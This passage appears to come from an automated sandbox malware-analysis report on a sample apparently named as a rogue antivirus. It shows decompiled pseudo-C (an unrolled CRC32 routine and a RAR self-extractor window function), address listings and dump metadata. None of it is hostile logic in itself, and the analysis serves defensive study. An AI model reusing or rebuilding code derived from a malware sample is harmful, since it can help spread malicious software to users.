                                                                                                                                                  						_t28 = (((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
                                                                                                                                                  						_t71 = _t71 - 1;
                                                                                                                                                  					} while (_t71 != 0);
                                                                                                                                                  				}
                                                                                                                                                  				_t54 = 0;
                                                                                                                                                  				if(_t74 > 0) {
                                                                                                                                                  					do {
                                                                                                                                                  						_t28 = _t28 >> 0x00000008 ^  *(0x4141c0 + ( *(_t54 + _t53) & 0x000000ff ^ _t28 & 0x000000ff) * 4);
                                                                                                                                                  						_t54 = _t54 + 1;
                                                                                                                                                  					} while (_t54 < _t74);
                                                                                                                                                  				}
                                                                                                                                                  				return _t28;
                                                                                                                                                  			}









                                                                                                                                                  0x00402ccc
                                                                                                                                                  0x00402cce
                                                                                                                                                  0x00402cce
                                                                                                                                                  0x00402cd3
                                                                                                                                                  0x00402cd7
                                                                                                                                                  0x00402cdc
                                                                                                                                                  0x00402ce1
                                                                                                                                                  0x00402cf5
                                                                                                                                                  0x00402cfc
                                                                                                                                                  0x00402cfd
                                                                                                                                                  0x00402cfd
                                                                                                                                                  0x00402d03
                                                                                                                                                  0x00402d07
                                                                                                                                                  0x00402d0a
                                                                                                                                                  0x00402d0a
                                                                                                                                                  0x00402d0c
                                                                                                                                                  0x00402d1c
                                                                                                                                                  0x00402d7a
                                                                                                                                                  0x00402d81
                                                                                                                                                  0x00402d81
                                                                                                                                                  0x00402d0a
                                                                                                                                                  0x00402d84
                                                                                                                                                  0x00402d88
                                                                                                                                                  0x00402d8b
                                                                                                                                                  0x00402d97
                                                                                                                                                  0x00402d9e
                                                                                                                                                  0x00402d9f
                                                                                                                                                  0x00402da3
                                                                                                                                                  0x00402da6

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f0356b928a5c8748b773292bb5a3f3348234b7994c9787135c7941ce81f34bb9
                                                                                                                                                  • Instruction ID: 0cb11850dc2377cddf84538798f7ae426082b721ee3b3fe272e98e9b9c12c88d
                                                                                                                                                  • Opcode Fuzzy Hash: f0356b928a5c8748b773292bb5a3f3348234b7994c9787135c7941ce81f34bb9
                                                                                                                                                  • Instruction Fuzzy Hash: D621F6318340B16AC344EAA9FD8C57737D2EBD3306759867AD780932D4C23CA952D778
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                  			E00406D54(void* __ecx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				struct tagPOINT _v20;
                                                                                                                                                  				struct HWND__* _t37;
                                                                                                                                                  				struct HWND__* _t38;
                                                                                                                                                  				long _t41;
                                                                                                                                                  				struct HWND__* _t43;
                                                                                                                                                  				struct HWND__* _t44;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  				CHAR* _t75;
                                                                                                                                                  
                                                                                                                                                  				_t74 = __ecx;
                                                                                                                                                  				if( *((char*)(__ecx + 0x14)) == 0) {
                                                                                                                                                  					__imp__OleInitialize(0);
                                                                                                                                                  					__imp__#17();
                                                                                                                                                  					 *((char*)(__ecx + 0x14)) = 1;
                                                                                                                                                  				}
                                                                                                                                                  				 *((char*)(_t74 + 0x15)) = 0;
                                                                                                                                                  				ShowWindow(_a8, 0);
                                                                                                                                                  				E00406CED(_t74, _a4);
                                                                                                                                                  				 *((intOrPtr*)(_t74 + 0x10)) = _a12;
                                                                                                                                                  				GetWindowRect(_a8,  &_v20);
                                                                                                                                                  				MapWindowPoints(0, GetParent(_a8),  &_v20, 2);
                                                                                                                                                  				_t37 =  *(_t74 + 4);
                                                                                                                                                  				if(_t37 != 0) {
                                                                                                                                                  					DestroyWindow(_t37);
                                                                                                                                                  				}
                                                                                                                                                  				_t38 = GetParent(_a8);
                                                                                                                                                  				_t41 = _v20.x;
                                                                                                                                                  				_t67 = _v12 - _t41;
                                                                                                                                                  				_t43 = CreateWindowExA(0, "RarHtmlClassName", 0, 0x40000000, _t41 + 1, _v20.y, _v12 - _t41, _v8 - _v20.y, _t38, 0,  *_t74, _t74);
                                                                                                                                                  				 *(_t74 + 4) = _t43;
                                                                                                                                                  				if(_t43 != 0) {
                                                                                                                                                  					ShowWindow(_t43, 5);
                                                                                                                                                  					_t43 = UpdateWindow( *(_t74 + 4));
                                                                                                                                                  				}
                                                                                                                                                  				if( *((char*)(_t74 + 0x15)) == 0) {
                                                                                                                                                  					_t44 =  *(_t74 + 4);
                                                                                                                                                  					if(_t44 != 0) {
                                                                                                                                                  						DestroyWindow(_t44);
                                                                                                                                                  						 *(_t74 + 4) = 0;
                                                                                                                                                  					}
                                                                                                                                                  					ShowWindow(_a8, 5);
                                                                                                                                                  					_t61 = E0040A1EC(0x100 + E0040A384(_t67, _a12) * 6);
                                                                                                                                                  					E0040A477(_t49, _a12);
                                                                                                                                                  					if(E004065B9(_t61) == 0) {
                                                                                                                                                  						E004065E9(_t74, _t61);
                                                                                                                                                  					}
                                                                                                                                                  					_t75 = E00406A19(_t74, _t61);
                                                                                                                                                  					_t43 = E0040A205(_t61);
                                                                                                                                                  					if(_t75 != 0) {
                                                                                                                                                  						SetWindowTextA(_a8, _t75);
                                                                                                                                                  						return E0040A205(_t75);
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					if( *((intOrPtr*)(_t74 + 0x18)) > 0x64) {
                                                                                                                                                  						return E004066B3(_t74);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t43;
                                                                                                                                                  			}













                                                                                                                                                  0x00406d5c
                                                                                                                                                  0x00406d63
                                                                                                                                                  0x00406d67
                                                                                                                                                  0x00406d6d
                                                                                                                                                  0x00406d73
                                                                                                                                                  0x00406d73
                                                                                                                                                  0x00406d82
                                                                                                                                                  0x00406d86
                                                                                                                                                  0x00406d8d
                                                                                                                                                  0x00406d95
                                                                                                                                                  0x00406d9f
                                                                                                                                                  0x00406db9
                                                                                                                                                  0x00406dbf
                                                                                                                                                  0x00406dc4
                                                                                                                                                  0x00406dc7
                                                                                                                                                  0x00406dc7
                                                                                                                                                  0x00406dd5
                                                                                                                                                  0x00406de4
                                                                                                                                                  0x00406dea
                                                                                                                                                  0x00406dfd
                                                                                                                                                  0x00406e03
                                                                                                                                                  0x00406e08
                                                                                                                                                  0x00406e0d
                                                                                                                                                  0x00406e12
                                                                                                                                                  0x00406e12
                                                                                                                                                  0x00406e1c
                                                                                                                                                  0x00406e2d
                                                                                                                                                  0x00406e32
                                                                                                                                                  0x00406e35
                                                                                                                                                  0x00406e3b
                                                                                                                                                  0x00406e3b
                                                                                                                                                  0x00406e43
                                                                                                                                                  0x00406e5e
                                                                                                                                                  0x00406e61
                                                                                                                                                  0x00406e70
                                                                                                                                                  0x00406e75
                                                                                                                                                  0x00406e75
                                                                                                                                                  0x00406e83
                                                                                                                                                  0x00406e85
                                                                                                                                                  0x00406e8c
                                                                                                                                                  0x00406e92
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406e99
                                                                                                                                                  0x00406e1e
                                                                                                                                                  0x00406e22
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406e26
                                                                                                                                                  0x00406e22
                                                                                                                                                  0x00406ea2

                                                                                                                                                  APIs
